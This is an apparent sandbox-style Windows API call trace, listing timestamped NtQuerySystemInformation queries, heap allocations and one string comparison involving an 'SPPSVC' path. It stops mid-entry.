NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec10, Length=0x28, ResultLength=0x0) [0182.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec10, Length=0x28, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec10, Length=0x28, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x28, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x38, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x28, ResultLength=0x0) [0182.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x28, ResultLength=0x0) [0182.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x38, ResultLength=0x0) [0182.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0182.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x20, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x20, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x20, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x38, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x20, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x20, ResultLength=0x0) [0182.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.510] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0182.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee98, Length=0x50, ResultLength=0x0) [0182.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x38, ResultLength=0x0) [0182.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x28, ResultLength=0x0) [0182.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x28, ResultLength=0x0) [0182.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x28, ResultLength=0x0) [0182.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x28, ResultLength=0x0) [0182.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x38, ResultLength=0x0) [0182.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x28, ResultLength=0x0) [0182.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x28, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x38, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec40, Length=0x20, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x38, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec40, Length=0x20, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x20, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x20, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a67ff030 | out: lpSystemTimeAsFileTime=0xf7a67ff030*(dwLowDateTime=0xff26d2d6, dwHighDateTime=0x1d63873)) [0182.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.532] GetProcessHeap () returned 0x27fc8db0000 [0182.532] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8e0ea20 [0182.533] GetProcessHeap () returned 0x27fc8db0000 [0182.533] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc8dfca70 [0182.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.533] GetProcessHeap () returned 0x27fc8db0000 [0182.533] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8e019c0 [0182.533] GetProcessHeap () returned 0x27fc8db0000 [0182.533] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc8dfc650 [0182.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.680] GetProcessHeap () returned 0x27fc8db0000 [0182.681] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbcbc0 [0182.681] GetProcessHeap () returned 0x27fc8db0000 [0182.681] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc8e02910 [0182.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.794] GetProcessHeap () returned 0x27fc8db0000 [0182.794] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8e00a70 [0182.794] GetProcessHeap () returned 0x27fc8db0000 [0182.794] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc8dfc950 [0182.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.795] GetProcessHeap () returned 0x27fc8db0000 [0182.795] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc9e0 [0182.795] GetProcessHeap () returned 0x27fc8db0000 [0182.795] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc8e02510 [0182.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec20, Length=0x50, ResultLength=0x0) [0182.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.478] GetProcessHeap () returned 0x27fc8db0000 [0183.478] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xb0) returned 0x27fc8dfde00 [0183.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x50, ResultLength=0x0) [0183.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x50, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x50, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x50, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x50, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x50, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x50, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x38, ResultLength=0x0) [0183.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0183.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0183.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0183.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0183.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x28, ResultLength=0x0) [0183.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x38, ResultLength=0x0) [0183.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x28, ResultLength=0x0) [0183.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x28, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x38, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x38, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x20, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x20, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x20, ResultLength=0x0) [0183.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x28, ResultLength=0x0) [0183.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.505] NtQuerySystemInformation 